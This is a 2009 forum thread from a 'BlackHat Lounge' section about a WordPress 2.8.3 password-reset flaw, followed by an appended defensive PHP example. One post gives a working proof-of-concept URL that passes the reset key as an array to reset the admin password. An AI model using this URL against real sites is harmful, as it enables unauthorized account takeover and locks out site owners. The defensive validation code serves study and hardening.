New WordPress security

Discussion in 'BlackHat Lounge' started by gundamwing, Aug 11, 2009.

  1. gundamwing

    gundamwing Supreme Member

    Joined:
    Sep 18, 2008
    Messages:
    1,284
    Likes Received:
    921
    Secure your blog now


    Code:
    http://www.milw0rm.com/exploits/9410
    III. DESCRIPTION
    -------------------------
    The way WordPress handles a password reset looks like this:
    You submit your email address or username via this form /wp-login.php?action=lostpassword ;
    WordPress sends you a reset confirmation like this via email:

    "
    Someone has asked to reset the password for the following site and username.
    http://DOMAIN_NAME.TLD/wordpress
    Username: admin
    To reset your password visit the following address, otherwise just
    ignore this email and nothing will happen

    http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
    "

    You click on the link, and then WordPress resets your admin password, and
    sends you another email with your new credentials.
     
  2. royalmice

    royalmice BANNED

    Joined:
    Aug 23, 2007
    Messages:
    1,186
    Likes Received:
    983
    Sorry but I just don't get it, what is it supposed to do? The password reset thing ain't new
     
  3. cheap2art

    cheap2art BANNED

    Joined:
    Oct 21, 2008
    Messages:
    159
    Likes Received:
    13
    WP just updated but it's buggy already?? Great!
    BTW, how do hackers know the right "key" to reset the admin password???
     
  4. gundamwing

    gundamwing Supreme Member

    Joined:
    Sep 18, 2008
    Messages:
    1,284
    Likes Received:
    921
  5. tsanko

    tsanko Senior Member

    Joined:
    Aug 9, 2008
    Messages:
    862
    Likes Received:
    1,041

    How? :)
     
  6. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Joined:
    Apr 2, 2008
    Messages:
    976
    Likes Received:
    3,476
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    It sends the email to the person who owns the name. You can't access it...
     
  7. Keedev

    Keedev Regular Member

    Joined:
    Apr 2, 2008
    Messages:
    290
    Likes Received:
    100
    It just resets, no need to access anything.


    Clarify: 2.8.3/WordPress. Still on 7 :flame:
     
  8. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Joined:
    Apr 2, 2008
    Messages:
    976
    Likes Received:
    3,476
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    I tried it and it said, 'click the link below to reset'.

    I didn't, so everything stayed the same.
     
  9. khan0

    khan0 Registered Member

    Joined:
    Jul 16, 2008
    Messages:
    74
    Likes Received:
    16
    Location:
    Toronto
    You need to pass the key as an array.

    A web browser is sufficient to reproduce this proof of concept:
    Code:
    http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
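As an added example (not code from this thread or from WordPress), here is the defender's view of the check the last two posts are about: why a key handed over as an array slips past a plain emptiness test, and a hardened validation that type-checks the key and refuses to match an empty pending key. The naive function is an assumption about the vulnerable pattern, and the stored key values are constructed samples.

```php
<?php
// Added example, not code from this thread or from WordPress. It models the
// reset-key check a defender wants: the key must be a non-empty string that
// matches a non-empty pending key. $stored_key stands in for a user's
// user_activation_key column and is a constructed sample value.

// Naive check (assumption about the vulnerable pattern): empty() is the only
// guard. For ?key[]= PHP yields array(''), which is a non-empty array, so the
// guard passes and the lookup runs with whatever the array turns into.
function naive_key_check($raw_key): bool
{
    $key = preg_replace('/[^a-z0-9]/i', '', $raw_key); // array in, array out
    return !empty($key);
}

// Hardened check: type-test before anything else, never let an empty key
// match an empty stored key, and compare in constant time.
function validate_reset_key($raw_key, string $stored_key): bool
{
    if (!is_string($raw_key)) {
        return false;
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $raw_key);
    if ($key === '' || $stored_key === '') {
        return false;
    }
    return hash_equals($stored_key, $key);
}

// Constructed inputs mirroring the thread: the sample key from the quoted
// email, the key[]= array from the proof of concept, and an admin account
// with no pending reset (empty stored key).
$pending_key = 'o7naCKN3OoeU2KJMMsag';
$cases = [
    'legitimate link'  => ['o7naCKN3OoeU2KJMMsag', $pending_key],
    'key[]= array'     => [[''], ''],
    'empty key string' => ['', ''],
];
foreach ($cases as $label => [$raw, $stored]) {
    printf("%-18s naive: %s  hardened: %s\n", $label,
        naive_key_check($raw) ? 'accepts' : 'rejects',
        validate_reset_key($raw, $stored) ? 'accepts' : 'rejects');
}
```

The array case is the one to watch in access logs as well: a reset request whose key parameter is not a plain string is never a legitimate click on the emailed link.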